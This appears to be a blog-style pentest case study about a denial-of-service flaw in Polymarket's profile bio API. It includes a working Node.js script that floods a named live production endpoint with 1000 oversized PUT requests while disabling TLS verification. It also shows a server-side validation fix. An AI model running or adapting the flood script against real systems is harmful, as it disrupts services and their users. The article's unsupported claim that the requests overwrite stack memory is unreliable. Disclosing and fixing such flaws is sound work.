Pentesting Polymarket

Ociper

Aug 30, 2024

About Polymarket

Polymarket is a decentralized information market platform that allows users to trade on the outcomes of real-world events using blockchain technology. Participants can create markets around various topics, such as elections or sports results, and trade shares based on their predictions. The price of shares reflects the perceived probability of a particular outcome, and after the event occurs, the market settles with payouts for those who predicted correctly. Polymarket operates using the PMK token for governance and staking, ensuring a transparent, decentralized trading experience.


Polymarket, a prominent prediction market platform, recently faced a critical vulnerability in its profile sanitization mechanism. This flaw allowed attackers to inject a substantial amount of extraneous "junk" data into the database and API interface, leading to potential crashes and service disruptions. This case study covers the technical details of the vulnerability, its exploitation, and the resulting impact on the platform.


Vulnerability Overview

The vulnerability resides in the profile sanitization mechanism of Polymarket's API, specifically within the user profile creation and bio editing functionality. By exploiting this flaw, an attacker can generate excessive data payloads, overwhelming the database and API interface (gamma-api.polymarket.com). This can lead to a complete crash of the platform.

Affected Endpoints:

  • https://gamma-api.polymarket.com/profiles/${ID} (HTTP Method: PUT)
  • https://gamma-api.polymarket.com/

Exploitation Details

The flaw was identified in the process of creating or editing a user's bio. While the frontend HTML/JavaScript interface imposes a 200-character limit on the bio field, the API lacks proper validation for input size and type. This oversight allows attackers to bypass the frontend restrictions and submit malicious payloads directly to the API.
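The missing check described above is a server-side one: the 200-character limit and string type must be enforced where the request is processed, not only in the browser. The following is an added example of such validation (not Polymarket's code); it assumes the endpoint receives a JSON body of the form { bio: string } and applies a hypothetical raw-body cap in addition to the length limit.

```javascript
// Added example (not Polymarket's code): server-side validation for the
// profile bio update that the page says was only enforced in the frontend.
// Assumed request shape: PUT /profiles/:id with JSON body { bio: string }.

const MAX_BIO_LENGTH = 200;       // the limit the frontend already applies
const MAX_BODY_BYTES = 4 * 1024;  // assumed hard cap on the raw request body

// Validate a parsed JSON body. Returns { ok: true, bio } or { ok: false, error }.
function validateBioUpdate(body) {
  if (body === null || typeof body !== 'object' || Array.isArray(body)) {
    return { ok: false, error: 'body must be a JSON object' };
  }
  const { bio } = body;
  if (typeof bio !== 'string') {
    return { ok: false, error: 'bio must be a string' };
  }
  // Count code points rather than UTF-16 units so the limit matches the UI.
  if (Array.from(bio).length > MAX_BIO_LENGTH) {
    return { ok: false, error: `bio exceeds ${MAX_BIO_LENGTH} characters` };
  }
  // Reject control characters (tab, LF and CR are allowed).
  if (/[\u0000-\u0008\u000B\u000C\u000E-\u001F\u007F]/.test(bio)) {
    return { ok: false, error: 'bio contains control characters' };
  }
  return { ok: true, bio };
}

// Check the declared body size before parsing; a missing or non-numeric
// Content-Length is rejected so oversized bodies are never buffered.
function bodySizeAllowed(headers) {
  const declared = Number(headers['content-length']);
  return Number.isInteger(declared) && declared >= 0 && declared <= MAX_BODY_BYTES;
}

// Framework-agnostic handler: maps a request to an HTTP status and payload.
function handleProfileUpdate(req) {
  if (!bodySizeAllowed(req.headers)) {
    return { status: 413, body: { error: 'payload too large' } };
  }
  let parsed;
  try {
    parsed = JSON.parse(req.rawBody);
  } catch (e) {
    return { status: 400, body: { error: 'invalid JSON' } };
  }
  const result = validateBioUpdate(parsed);
  if (!result.ok) return { status: 400, body: { error: result.error } };
  // Persisting result.bio for req.params.id would happen here (assumed).
  return { status: 204, body: null };
}
```

With these checks in place, the 90999-character payload from the page is rejected at the size check with 413 before the body is parsed, and a 201-character string is rejected with 400.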


Through the API directly


Initial exploit testing:

A large payload consisting of non-string data (e.g., & characters) was submitted to the bio field. This payload bypassed the server's validation checks and was processed successfully, resulting in a 204 No Content response after a significant delay. By repeatedly sending crafted HTTP requests with the large payload to the https://gamma-api.polymarket.com/profiles/${ID} endpoint, an attacker can cause the webserver process to overwrite parts of its stack memory. This manipulation alters the request-handling flow, leading to a crash of the API interface.

    const axios = require('axios');

    // Oversized bio value, far beyond the frontend's 200-character limit
    const jsonData = { bio: '%'.repeat(90999) };

    async function sendRequest() {
      try {
        const response = await axios.put('https://gamma-api.polymarket.com/profiles/ID', jsonData, {
          httpsAgent: new (require('https').Agent)({ rejectUnauthorized: false })
        });
        console.log(response.data);
      } catch (error) {
        console.error('Error:', error.message);
      }
    }

    const numRequests = 1000;
    const interval = 100; // milliseconds between requests

    let requestCount = 0;

    // Send the PUT request on a fixed interval until numRequests is reached
    const intervalId = setInterval(() => {
      if (requestCount < numRequests) {
        sendRequest();
        requestCount++;
      } else {
        clearInterval(intervalId);
        console.log('All requests sent.');
      }
    }, interval);



Conclusion

This case study highlights the importance of robust input validation and memory management in API design. The Polymarket vulnerability serves as a reminder that even seemingly minor oversights can lead to significant security incidents. By addressing these issues, organizations can safeguard their systems against similar exploits.

